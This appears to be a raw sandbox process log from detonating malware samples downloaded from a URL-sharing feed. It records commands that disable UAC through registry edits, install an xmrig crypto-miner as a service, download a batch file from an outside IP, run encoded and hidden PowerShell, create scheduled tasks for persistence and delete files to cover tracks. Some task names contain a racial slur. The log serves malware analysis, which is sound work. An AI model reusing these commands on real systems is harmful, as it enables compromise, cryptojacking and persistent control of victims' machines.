"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1912,6619157750662392766,17546121577155623261,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4248 /prefetch:2

C:\Users\Admin\Downloads\UrlHausFiles\xmrig.exe

"C:\Users\Admin\Downloads\UrlHausFiles\xmrig.exe"

C:\Users\Admin\Downloads\UrlHausFiles\OSM-Client.exe

"C:\Users\Admin\Downloads\UrlHausFiles\OSM-Client.exe"

C:\Users\Admin\AppData\Local\Temp\23472\nssm.exe

"23472\nssm.exe" set c3pool_miner_59 AppDirectory "23472"

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1912,6619157750662392766,17546121577155623261,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4340 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1912,6619157750662392766,17546121577155623261,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4892 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1912,6619157750662392766,17546121577155623261,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2460 /prefetch:2

C:\Users\Admin\Downloads\UrlHausFiles\FiddlerSetup.exe

"C:\Users\Admin\Downloads\UrlHausFiles\FiddlerSetup.exe"

C:\Users\Admin\AppData\Local\Temp\nsfE972.tmp\FiddlerSetup.exe

"C:\Users\Admin\AppData\Local\Temp\nsfE972.tmp\FiddlerSetup.exe" /D=

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F

C:\Users\Admin\AppData\Local\Temp\23472\nssm.exe

"23472\nssm.exe" set c3pool_miner_59 AppPriority BELOW_NORMAL_PRIORITY_CLASS

C:\Users\Admin\Downloads\UrlHausFiles\%E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exe

"C:\Users\Admin\Downloads\UrlHausFiles\%E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1912,6619157750662392766,17546121577155623261,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4088 /prefetch:2

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F

C:\Users\Admin\Downloads\UrlHausFiles\ew.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ew.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1912,6619157750662392766,17546121577155623261,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=5072 /prefetch:2

C:\Users\Admin\Downloads\UrlHausFiles\r.exe

"C:\Users\Admin\Downloads\UrlHausFiles\r.exe"

C:\Windows\System32\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\UrlHausFiles\ONHQNHFT.msi"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"

C:\Users\Admin\Downloads\UrlHausFiles\ScreenUpdateSync.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ScreenUpdateSync.exe"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\System32\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\UrlHausFiles\Deccastationers.msi"

C:\Windows\system32\reg.exe

reg query HKEY_CLASSES_ROOT\http\shell\open\command

C:\Users\Admin\Downloads\UrlHausFiles\arma3sync.exe

"C:\Users\Admin\Downloads\UrlHausFiles\arma3sync.exe"

C:\Users\Admin\AppData\Local\Temp\is-1DPP3.tmp\arma3sync.tmp

"C:\Users\Admin\AppData\Local\Temp\is-1DPP3.tmp\arma3sync.tmp" /SL5="$2042A,4387946,67072,C:\Users\Admin\Downloads\UrlHausFiles\arma3sync.exe"

C:\Users\Admin\Downloads\UrlHausFiles\test.exe

"C:\Users\Admin\Downloads\UrlHausFiles\test.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5684 -ip 5684

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\center.exe

"C:\Users\Admin\Downloads\UrlHausFiles\center.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5684 -s 284

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 4136 -ip 4136

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\CenterRun.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\CenterRun.exe

C:\Users\Admin\Downloads\UrlHausFiles\stail.exe

"C:\Users\Admin\Downloads\UrlHausFiles\stail.exe"

C:\Users\Admin\AppData\Local\Temp\is-SDF87.tmp\stail.tmp

"C:\Users\Admin\AppData\Local\Temp\is-SDF87.tmp\stail.tmp" /SL5="$10730,3522820,54272,C:\Users\Admin\Downloads\UrlHausFiles\stail.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 1392

C:\Users\Admin\AppData\Local\Temp\23472\nssm.exe

"23472\nssm.exe" set c3pool_miner_59 AppStdout "23472\stdout"

C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe

"C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe"

C:\Users\Admin\Downloads\UrlHausFiles\def.exe

"C:\Users\Admin\Downloads\UrlHausFiles\def.exe"

C:\Users\Admin\Downloads\UrlHausFiles\DK.exe

"C:\Users\Admin\Downloads\UrlHausFiles\DK.exe"

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" pause darel_video_studio_1213

C:\Users\Admin\AppData\Local\Darel VideoStudio Free 1.0.3.3\darelvideostudio.exe

"C:\Users\Admin\AppData\Local\Darel VideoStudio Free 1.0.3.3\darelvideostudio.exe" -i

C:\Users\Admin\Downloads\UrlHausFiles\CrazyCoach.exe

"C:\Users\Admin\Downloads\UrlHausFiles\CrazyCoach.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\NG2.bat" "

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 pause darel_video_studio_1213

C:\Users\Admin\Downloads\UrlHausFiles\aa.exe

"C:\Users\Admin\Downloads\UrlHausFiles\aa.exe"

C:\Windows\SysWOW64\openwith.exe

"C:\Windows\system32\openwith.exe"

C:\Users\Admin\AppData\Local\palladiums\translucently.exe

"C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat"

\??\c:\windows\SysWOW64\svchost.exe

c:\windows\system32\svchost.exe

C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe

"C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5848 -ip 5848

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\whoami.exe

whoami

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5848 -s 568

C:\Users\Admin\Downloads\UrlHausFiles\server.exe

"C:\Users\Admin\Downloads\UrlHausFiles\server.exe"

C:\Users\Admin\Downloads\UrlHausFiles\LedgerUpdater.exe

"C:\Users\Admin\Downloads\UrlHausFiles\LedgerUpdater.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 8076 -ip 8076

C:\Users\Admin\Downloads\UrlHausFiles\ipscan.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ipscan.exe"

C:\Users\Admin\AppData\Local\Temp\23472\nssm.exe

"23472\nssm.exe" set c3pool_miner_59 AppStderr "23472\stderr"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 8076 -s 912

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\Downloads\UrlHausFiles\LedgerUpdater.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff8fb613cb8,0x7ff8fb613cc8,0x7ff8fb613cd8

C:\Windows\system32\attrib.exe

attrib +s +h d:\net

C:\Windows\SysWOW64\PING.EXE

ping 2.2.2.2 -n 1 -w 3000

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2016,7410014677920508458,15198350126555560318,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2044 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2016,7410014677920508458,15198350126555560318,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2016,7410014677920508458,15198350126555560318,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2516 /prefetch:8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"

C:\Users\Admin\AppData\Local\Temp\23472\nssm.exe

"23472\nssm.exe" start c3pool_miner_59

C:\Users\Admin\AppData\Local\Temp\23472\nssm.exe

C:\Users\Admin\AppData\Local\Temp\23472\nssm.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,7410014677920508458,15198350126555560318,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3496 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,7410014677920508458,15198350126555560318,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3524 /prefetch:1

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\System32\oobe\UserOOBEBroker.exe

C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,7410014677920508458,15198350126555560318,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4136 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding

C:\Users\Admin\Downloads\UrlHausFiles\update.exe

C:\Users\Admin\Downloads\UrlHausFiles\update.exe 7832

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca

C:\Users\Admin\Downloads\UrlHausFiles\key.exe

"C:\Users\Admin\Downloads\UrlHausFiles\key.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 8436 -ip 8436

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 8436 -s 400

C:\Users\Admin\Downloads\UrlHausFiles\random.exe

"C:\Users\Admin\Downloads\UrlHausFiles\random.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\MJPVgHw.exe

"C:\Users\Admin\Downloads\UrlHausFiles\MJPVgHw.exe"

C:\Windows\system32\svchost.exe

"C:\Windows\system32\svchost.exe"

C:\Windows\system32\audiodg.exe

"C:\Windows\system32\audiodg.exe"

C:\Windows\system32\msiexec.exe

"C:\Windows\system32\msiexec.exe"

C:\Users\Admin\Downloads\UrlHausFiles\tstory.exe

"C:\Users\Admin\Downloads\UrlHausFiles\tstory.exe"

C:\Users\Admin\Downloads\UrlHausFiles\loader.exe

"C:\Users\Admin\Downloads\UrlHausFiles\loader.exe"

C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe

"C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe"

C:\Users\Admin\Downloads\UrlHausFiles\OLDxTEAM.exe

"C:\Users\Admin\Downloads\UrlHausFiles\OLDxTEAM.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1212 -ip 1212

C:\Windows\system32\tasklist.exe

tasklist /fi "imagename eq xmrig.exe"

C:\Users\Admin\AppData\Local\Temp\rhsgn_protected.exe

"C:\Users\Admin\AppData\Local\Temp\rhsgn_protected.exe"

C:\Windows\system32\find.exe

find /i "xmrig.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1212 -s 764

C:\Users\Admin\Downloads\UrlHausFiles\steamerx.exe

"C:\Users\Admin\Downloads\UrlHausFiles\steamerx.exe"

C:\Users\Admin\Downloads\UrlHausFiles\bp.exe

"C:\Users\Admin\Downloads\UrlHausFiles\bp.exe"

C:\Users\Admin\AppData\Local\Temp\ARA.exe

"C:\Users\Admin\AppData\Local\Temp\ARA.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\reviewintobrokerHost\aUs3pwix5Vd1U6IYzTsfZ9E8dEV3MF.vbe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\ud.bat" "

C:\Users\Admin\Downloads\UrlHausFiles\1188%E7%83%88%E7%84%B0.exe

"C:\Users\Admin\Downloads\UrlHausFiles\1188%E7%83%88%E7%84%B0.exe"

C:\Users\Admin\AppData\Local\Temp\5E04.tmp.x.exe

"C:\Users\Admin\AppData\Local\Temp\5E04.tmp.x.exe"

C:\Users\Admin\Downloads\UrlHausFiles\opengl32.dll40watson-sanchez4040830.exe

"C:\Users\Admin\Downloads\UrlHausFiles\opengl32.dll40watson-sanchez4040830.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c

C:\Users\Admin\Downloads\UrlHausFiles\logon.exe

"C:\Users\Admin\Downloads\UrlHausFiles\logon.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GIJEBKECBAKF" & exit

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.0.0.1

C:\Users\Admin\Downloads\UrlHausFiles\zke-ascv.exe

"C:\Users\Admin\Downloads\UrlHausFiles\zke-ascv.exe"

C:\Users\Admin\Downloads\UrlHausFiles\test26.exe

"C:\Users\Admin\Downloads\UrlHausFiles\test26.exe"

C:\Users\Admin\Downloads\UrlHausFiles\System.exe

"C:\Users\Admin\Downloads\UrlHausFiles\System.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\reviewintobrokerHost\WJgXY0RCE6WdWGoPyLk7f.bat" "

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\Bluescreen.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Bluescreen.exe"

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Users\Admin\AppData\Roaming\reviewintobrokerHost\Msblockreview.exe

"C:\Users\Admin\AppData\Roaming\reviewintobrokerHost\Msblockreview.exe"

C:\Users\Admin\AppData\Local\Temp\._cache_System.exe

"C:\Users\Admin\AppData\Local\Temp\._cache_System.exe"

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text

C:\ProgramData\Synaptics\Synaptics.exe

"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate

C:\Users\Admin\AppData\Local\Temp\81CA.tmp.zx.exe

"C:\Users\Admin\AppData\Local\Temp\81CA.tmp.zx.exe"

C:\Users\Admin\Downloads\UrlHausFiles\AUTOKEY.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AUTOKEY.exe"

C:\Users\Admin\AppData\Local\Temp\81CA.tmp.zx.exe

"C:\Users\Admin\AppData\Local\Temp\81CA.tmp.zx.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -Command "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe C:\\Users\\Public\\Document\\python C:\\Users\\Public\\Document\\Lib\\sim.py"

C:\Users\Admin\Downloads\UrlHausFiles\ps.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ps.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\Autoupdate.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Autoupdate.exe"

C:\Users\Admin\Downloads\UrlHausFiles\ss.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ss.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "niggersn" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\niggers.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "niggers" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\niggers.exe'" /rl HIGHEST /f

C:\Users\Admin\Downloads\UrlHausFiles\UNICO-Venta3401005.exe

"C:\Users\Admin\Downloads\UrlHausFiles\UNICO-Venta3401005.exe"

C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe

"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "niggersn" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\niggers.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\cmd.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\cmd.exe'" /rl HIGHEST /f

C:\Users\Admin\Downloads\UrlHausFiles\dns1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\dns1.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f

C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.exe

"C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.exe"

C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" C:\\Users\\Public\\Document\\python C:\\Users\\Public\\Document\\Lib\\sim.py

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 13 /tr "'C:\cyb\temp\sysmon.exe'" /f

C:\Users\Admin\Downloads\UrlHausFiles\Diamotrix.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Diamotrix.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\cyb\temp\sysmon.exe'" /rl HIGHEST /f

C:\Windows\system32\svchost.exe

"C:\Windows\system32\svchost.exe"

C:\Windows\system32\audiodg.exe

"C:\Windows\system32\audiodg.exe"

C:\Windows\system32\msiexec.exe

"C:\Windows\system32\msiexec.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 8 /tr "'C:\cyb\temp\sysmon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "c1c" /sc MINUTE /mo 10 /tr "'C:\Archivos de programa\Unico - Ventas\c1.exe'" /f

C:\Archivos de programa\UNICO - Ventas\ODBC_VEN.exe

"C:\Archivos de programa\UNICO - Ventas\ODBC_VEN.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "c1" /sc ONLOGON /tr "'C:\Archivos de programa\Unico - Ventas\c1.exe'" /rl HIGHEST /f

C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe

"C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "c1c" /sc MINUTE /mo 9 /tr "'C:\Archivos de programa\Unico - Ventas\c1.exe'" /rl HIGHEST /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Archivos de programa\UNICO - Ventas\ODBC.cmd" "

C:\Windows\system32\schtasks.exe

SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "inst77player_1.0.0.1i" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Internet Explorer\ja-JP\inst77player_1.0.0.1.exe'" /f

C:\Users\Admin\Downloads\UrlHausFiles\c2.exe

"C:\Users\Admin\Downloads\UrlHausFiles\c2.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "inst77player_1.0.0.1" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\ja-JP\inst77player_1.0.0.1.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

